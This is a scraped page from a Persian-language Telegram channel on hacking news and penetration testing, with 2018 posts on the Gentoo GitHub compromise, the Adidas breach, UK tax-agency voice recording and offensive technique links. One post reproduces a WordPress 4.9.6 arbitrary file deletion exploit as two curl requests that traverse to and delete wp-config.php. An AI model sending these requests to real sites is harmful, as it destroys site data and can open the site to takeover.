امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
بر اساس گزارش شرکت Big Brother Watch که یک شرکت طرفدار حفظ حریم خصوصی و آزادی های مدنی در بریتانیاست، سیستم صوتی درآمد و گمرکات ملکه صداهای بیش از 5.1 میلیون شهروند بریتانیا را بدون اطلاع آنها ضبط کرده است.
این سیستم صوتی که از ژانویه سال قبل راه اندازی شده است برای تشخیص هویت افرادی که با این آژانس تماس میگیرند، استفاده میشود.
این سیستم در حال ایجاد یک دیتابیس تشخیص صدای بیومتریک برای حکومت است.
این کار مخالف بند ۹ قانون GDPR نیز به حساب می آید.


منبع:
https://www.hackread.com/voices-records-of-brits-stored-by-tax-agency/


#news
#britania
#privacy
#england


@sec_nerd
این میزان از شهامت در سال ۲۰۱۸ ستودنیه!

#windows
#smb
#win98
#eternalblue

@sec_nerd
wmi_slides.pdf
15.9 MB
حرکات جانبی در شبکه با استفاده از WMI

#windows
#network
#privesc
#lateral_movement


@sec_nerd
قابل توجه کاربران سیستم عامل Gentoo

روز گذشته حساب گیت هاب سیستم عامل Gentoo توسط هکر یا هکرها مورد حمله قرار گرفت و سورس کد اصلی با سورس کد آلوده جایگزین شد!
این هکرها که ماهیت شان شناخته شده نیست در روز ۲۸ ژوئن موفق به دستیابی به حساب گیت هاب این سیستم عامل شدند.


منبع:
https://thehackernews.com/2018/06/gentoo-linux-github.html

#news
#linux
#github
#gentoo
#malware


@sec_nerd
اکسپلویت جدید وردپرس که قابلیت حذف هر فایل دلخواه را به هکرها میدهد!

# Exploit Title: Wordpress <= 4.9.6 Arbitrary File Deletion Vulnerability
# Date: 2018-06-27
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.wordpress.org
# Software Link: https://www.wordpress.org/download
# Version: <= 4.9.6
# Tested on: php7 mysql5
# CVE :

Step 1:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=editattachment&_wpnonce=***&thumb=../../../../wp-config.php'


Step 2:


curl -v 'https://localhost/wp-admin/post.php?post=4' -H 'Cookie: ***' -d 'action=delete&_wpnonce=***'



#wordpress
#wp
#exploit
#web
#pentest

@sec_nerd
لیست ۵۰۰ سوپر کامپیوتر جهان منتشر شد و رتبه اول قوی ترین سوپر کامپیوتر به IBM Summit از امریکا اختصاص یافت.
در این رده بندی امریکا اول است اما سوپرکامپیوترهای چینی تعداد بیشتری دارند.
پس از سالها، توجه رده بندی ها از CPU به سوی GPU کشیده شده است و در این زمینه NVidia مجالی به رقبای خود برای خودنمایی نداده است.
نکته جالب توجه، استفاده تمامی این سوپرکامپیوترها از سیستم عامل لینوکس است! (همانند سالهای پیش)

منبع:
https://fossbytes.com/top500-most-powerful-supercomputer-list-2018-powered-by-linux/


#AI
#ML
#news
#linux
#gpu
#IBM
#usa
#chinna


@sec_nerd
Media is too big
VIEW IN TELEGRAM
reverse engineering the "feature" provided by the capcom.sys driver on #Windows using Binary Ninja and Windbg.with a working exploit written in C

@sec_nerd
پس از اعلام شرکت آدیداس مبنی بر هک شدن وبسایت نمایندگی امریکای این شرکت، جزییاتی در خصوص اطلاعات به سرقت رفته منتشر شده است.
این اطلاعات شامل نام های کاربری و مشخصات میلیونها کاربر آدیداس بوده است.
اما آدیداس معتقد است که اطلاعات مربوط به سلامت و حسابهای بانکی مشتریان در این حمله دزدیده نشده، بعلاوه پسوردهای هک شده همگی دارای رمزنگاری مناسب بوده اند که این نشان از آمادگی مناسب آدیداس در برابر حملات این چنینی دارد.
اما آمادگی در برابر حمله هایی در این شکل و شمایل کافی نیست و نیاز به کار مداوم و بروزرسانی های امنیتی دائمی دارد.

هنوز جزییات دقیق تری از سوی آدیداس درخصوص این حمله منتشر نشده است.


منبع:
https://www.hackread.com/hackers-steal-millions-of-customers-data-from-adidas-us-website/


#adidas
#breach
#news


@sec_nerd
usb_fan_report.pdf
251.9 KB
گزارش فنی-امنیتی از فن های usb مورد استفاده در نشست ترامپ و کیم جونگ اون در سنگاپور برای موارد جاسوسی

#spy
#usa
#nk
#enviromental


@sec_nerd
لینوکس SUSE که متعلق به یک شرکت بریتانیایی بود با قیمت 2.5 میلیارد دلار به یک شرکت سهامی سوئدی فروخته شد.

https://thehackernews.com/2018/07/suse-linux-acquired.html

#news
#linux

@sec_nerd
اجرای دستور در سرورهای ویندوزی با استفاده از آپلود فایل web.config

https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/


#windows
#pentest
#web
#rce


@sec_nerd